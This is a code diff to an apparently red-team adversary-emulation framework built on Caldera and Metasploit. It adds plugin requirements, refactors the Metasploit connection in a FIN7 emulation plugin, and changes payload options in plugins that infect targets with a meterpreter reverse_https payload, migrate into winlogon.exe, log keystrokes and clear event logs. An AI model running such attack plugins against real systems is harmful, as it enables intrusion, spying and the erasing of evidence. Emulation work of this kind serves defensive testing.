Simplifying Metasploit. Fixing stuff and adding requirement for plugins

plugins/base/attack.py

@@ -3,11 +3,19 @@
 
 import os
 from plugins.base.plugin_base import BasePlugin
-from app.exceptions import PluginError, ConfigurationError
+from app.exceptions import PluginError, ConfigurationError, RequirementError
 from app.calderacontrol import CalderaControl
 # from app.metasploit import MSFVenom, Metasploit
 from typing import Optional
 from plugins.base.machinery import MachineryPlugin
+from app.metasploit import MetasploitInstant
+from enum import Enum
+
+
+class Requirement(Enum):
+    """ Requirements for this plugin """
+    METASPLOIT = 1
+    CALDERA = 2
 
 
 class AttackPlugin(BasePlugin):
@@ -23,6 +31,8 @@ class AttackPlugin(BasePlugin):
     required_files_attacker: list[str] = []  # a list of files to automatically install to the attacker
     required_files_target: list[str] = []    # a list of files to automatically copy to the targets
 
+    requirements: Optional[list[Requirement]] = []  # Requirements to run this plugin
+
     # TODO: parse results
 
     def __init__(self):
@@ -38,6 +48,25 @@ class AttackPlugin(BasePlugin):
         self.metasploit_user: str = "user"
         self.metasploit = None
 
+    def needs_caldera(self) -> bool:
+        """ Returns True if this plugin has Caldera in the requirements """
+        if Requirement.CALDERA in self.requirements:
+            return True
+        return False
+
+    def needs_metasploit(self) -> bool:
+        """ Returns True if this plugin has Metasploit in the requirements """
+        if Requirement.METASPLOIT in self.requirements:
+            return True
+        return False
+
+    def connect_metasploit(self):
+        """ Inits metasploit """
+
+        if self.needs_metasploit():
+            self.metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
+        # If metasploit requirements are not set, self.metasploit stay None and using metasploit from a plugin not having the requirements will trigger an exception
+
     def copy_to_attacker_and_defender(self):
         """ Copy attacker/defender specific files to the machines. Called by setup, do not call it yourself. template processing happens before """
 
@@ -103,7 +132,9 @@ class AttackPlugin(BasePlugin):
 
          @param caldera: The caldera object to connect through
          """
-        self.caldera = caldera
+
+        if self.needs_caldera():
+            self.caldera = caldera
 
     def caldera_attack(self, target: MachineryPlugin, ability_id: str, parameters=None, **kwargs):
         """ Attack a single target using caldera
@@ -113,6 +144,9 @@ class AttackPlugin(BasePlugin):
         @param parameters: parameters to pass to the ability
         """
 
+        if not self.needs_caldera():
+            raise RequirementError("Caldera not in requirements")
+
         self.caldera.attack(paw=target.get_paw(),
                             ability_id=ability_id,
                             group=target.get_group(),

plugins/default/adversary_emulations/FIN7/fin7_section1.py

@@ -3,7 +3,7 @@
 # Adversary emulation for FIN7
 import socket
 
-from plugins.base.attack import AttackPlugin
+from plugins.base.attack import AttackPlugin, Requirement
 from app.interface_sfx import CommandlineColors
 from app.metasploit import MSFVenom, MetasploitInstant
 import os
@@ -20,6 +20,8 @@ class FIN7Plugin(AttackPlugin):
 
     required_files_attacker = []    # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
 
+    requirements = [Requirement.CALDERA, Requirement.METASPLOIT]
+
     ######
     payload_type_1 = "windows/x64/meterpreter/reverse_https"  # payload for initial stage
 
@@ -33,14 +35,15 @@ class FIN7Plugin(AttackPlugin):
 
         @param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https"
         """
-        if self.metasploit_1:
-            return self.metasploit_1
+        if self.metasploit:
+            return self.metasploit
+
+        self.connect_metasploit()
 
-        self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
         ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
-        self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
-        self.metasploit_1.wait_for_session()
-        return self.metasploit_1
+        self.metasploit.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
+        self.metasploit.wait_for_session()
+        return self.metasploit
 
     def step1(self):
         self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 1 (target hotelmanager): Initial Breach{CommandlineColors.ENDC}", 1)

plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py

@@ -38,7 +38,8 @@ class MetasploitClearevPlugin(AttackPlugin):
 
         metasploit.smart_infect(target,
                                 payload=payload_type,
-                                payload_name=payload_name,
+                                outfile=payload_name,
+                                format="exe",
                                 architecture="x64")
 
         metasploit.clearev(target)

plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py

@@ -38,7 +38,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
 
         metasploit.smart_infect(target,
                                 payload=payload_type,
-                                payload_name=payload_name,
+                                outfile=payload_name,
+                                format="exe",
                                 architecture="x64")
 
         uid = metasploit.getuid(target)

plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py

@@ -38,7 +38,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
 
         metasploit.smart_infect(target,
                                 payload=payload_type,
-                                payload_name=payload_name,
+                                outfile=payload_name,
+                                format="exe",
                                 architecture="x64")
 
         metasploit.migrate(target, name="winlogon.exe")

plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py

@@ -38,7 +38,8 @@ class MetasploitPsPlugin(AttackPlugin):
 
         metasploit.smart_infect(target,
                                 payload=payload_type,
-                                payload_name=payload_name,
+                                outfile=payload_name,
+                                format="exe",
                                 architecture="x64")
 
         metasploit.ps_process_discovery(target)

plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py

@@ -38,7 +38,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
 
         metasploit.smart_infect(target,
                                 payload=payload_type,
-                                payload_name=payload_name,
+                                outfile=payload_name,
+                                format="exe",
                                 architecture="x64")
 
         metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")

plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py

@@ -38,8 +38,9 @@ class MetasploitSysinfoPlugin(AttackPlugin):
 
         metasploit.smart_infect(target,
                                 payload=payload_type,
-                                payload_name=payload_name,
-                                architecture="x86")
+                                outfile=payload_name,
+                                format="exe",
+                                architecture="x64")
 
         si = metasploit.sysinfo(target)
         print(f"Sysinfo: {si}")